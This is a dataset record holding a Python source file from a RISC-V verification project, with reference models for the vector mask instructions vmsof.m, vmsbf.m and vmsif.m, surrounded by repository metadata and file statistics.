| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48e998851e93c20ed6c876fe4cb9d7d0e379eec1
| 3,579
|
py
|
Python
|
rvpvp/isa/rvv/vmsxx_m.py
|
ultrafive/riscv-pvp
|
843e38422c3d545352b955764927d5e7847e5453
|
[
"Unlicense"
] | 5
|
2021-05-10T09:57:00.000Z
|
2021-10-05T14:39:20.000Z
|
rvpvp/isa/rvv/vmsxx_m.py
|
ultrafive/riscv-pvp
|
843e38422c3d545352b955764927d5e7847e5453
|
[
"Unlicense"
] | null | null | null |
rvpvp/isa/rvv/vmsxx_m.py
|
ultrafive/riscv-pvp
|
843e38422c3d545352b955764927d5e7847e5453
|
[
"Unlicense"
] | 1
|
2021-05-14T20:24:11.000Z
|
2021-05-14T20:24:11.000Z
|
from ...isa.inst import *
import numpy as np
import math
class Vmsof_m(Inst):
name = 'vmsof.m'
def golden(self):
if 'mask' in self:
if 'vs2' in self:
tmp = np.unpackbits(self['vs2'] & self['mask'], bitorder='little')[0: self['vl']]
else:
tmp = np.unpackbits(self['mask'] & self['mask'], bitorder='little')[0: self['vl']]
else:
tmp = np.unpackbits(self['vs2'], bitorder='little')[0: self['vl']]
res = np.zeros(self['vl'], dtype=np.uint8)
if np.size(np.where(tmp == 1)) > 0:
firstOne = np.min(np.where(tmp == 1))
res[firstOne] = 1
if 'orign' in self:
orign_bits = np.unpackbits(self['orign'], bitorder='little')
if 'mask' in self:
mask = np.unpackbits(self['mask'], bitorder='little')[0: self['vl']]
res = np.where( mask == 1, res, orign_bits[0:self['vl']])
orign_bits[0:self['vl']] = res[0:self['vl']]
return np.packbits(orign_bits, bitorder='little')
return np.packbits(res, bitorder='little')
class Vmsbf_m(Inst):
name = 'vmsbf.m'
def golden(self):
if 'mask' in self:
if 'vs2' in self:
tmp = np.unpackbits(self['vs2'] & self['mask'], bitorder='little')[0: self['vl']]
else:
tmp = np.unpackbits(self['mask'] & self['mask'], bitorder='little')[0: self['vl']]
else:
tmp = np.unpackbits(self['vs2'], bitorder='little')[0: self['vl']]
res = np.ones(self['vl'], dtype=np.uint8)
if np.size(np.where(tmp == 1)) > 0:
firstOne = np.min(np.where(tmp == 1))
for i in range(firstOne, self['vl']):
res[i] = 0
if 'mask' in self:
mask = np.unpackbits(self['mask'], bitorder='little')[0:self['vl']]
res = np.where( mask == 1, res, 0)
if 'orign' in self:
orign_bits = np.unpackbits(self['orign'], bitorder='little')
if 'mask' in self:
mask = np.unpackbits(self['mask'], bitorder='little')[0: self['vl']]
res = np.where( mask == 1, res, orign_bits[0:self['vl']])
orign_bits[0:self['vl']] = res[0:self['vl']]
return np.packbits(orign_bits, bitorder='little')
return np.packbits(res, bitorder='little')
class Vmsif_m(Inst):
name = 'vmsif.m'
def golden(self):
if 'mask' in self:
if 'vs2' in self:
tmp = np.unpackbits(self['vs2'] & self['mask'], bitorder='little')[0: self['vl']]
else:
tmp = np.unpackbits(self['mask'] & self['mask'], bitorder='little')[0: self['vl']]
else:
tmp = np.unpackbits(self['vs2'], bitorder='little')[0: self['vl']]
res = np.ones(self['vl'], dtype=np.uint8)
if np.size(np.where(tmp == 1)) > 0:
firstOne = np.min(np.where(tmp == 1))
for i in range(firstOne+1, self['vl']):
res[i] = 0
if 'mask' in self:
mask = np.unpackbits(self['mask'], bitorder='little')[0:self['vl']]
res = np.where( mask == 1, res, 0)
if 'orign' in self:
orign_bits = np.unpackbits(self['orign'], bitorder='little')
if 'mask' in self:
mask = np.unpackbits(self['mask'], bitorder='little')[0: self['vl']]
res = np.where( mask == 1, res, orign_bits[0:self['vl']])
orign_bits[0:self['vl']] = res[0:self['vl']]
return np.packbits(orign_bits, bitorder='little')
return np.packbits(res, bitorder='little')
| 41.137931
| 96
| 0.525007
| 484
| 3,579
| 3.85124
| 0.092975
| 0.090129
| 0.086373
| 0.142704
| 0.934549
| 0.934549
| 0.934549
| 0.934549
| 0.934549
| 0.934549
| 0
| 0.021501
| 0.285275
| 3,579
| 87
| 97
| 41.137931
| 0.707193
| 0
| 0
| 0.831169
| 0
| 0
| 0.100559
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038961
| false
| 0
| 0.038961
| 0
| 0.233766
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.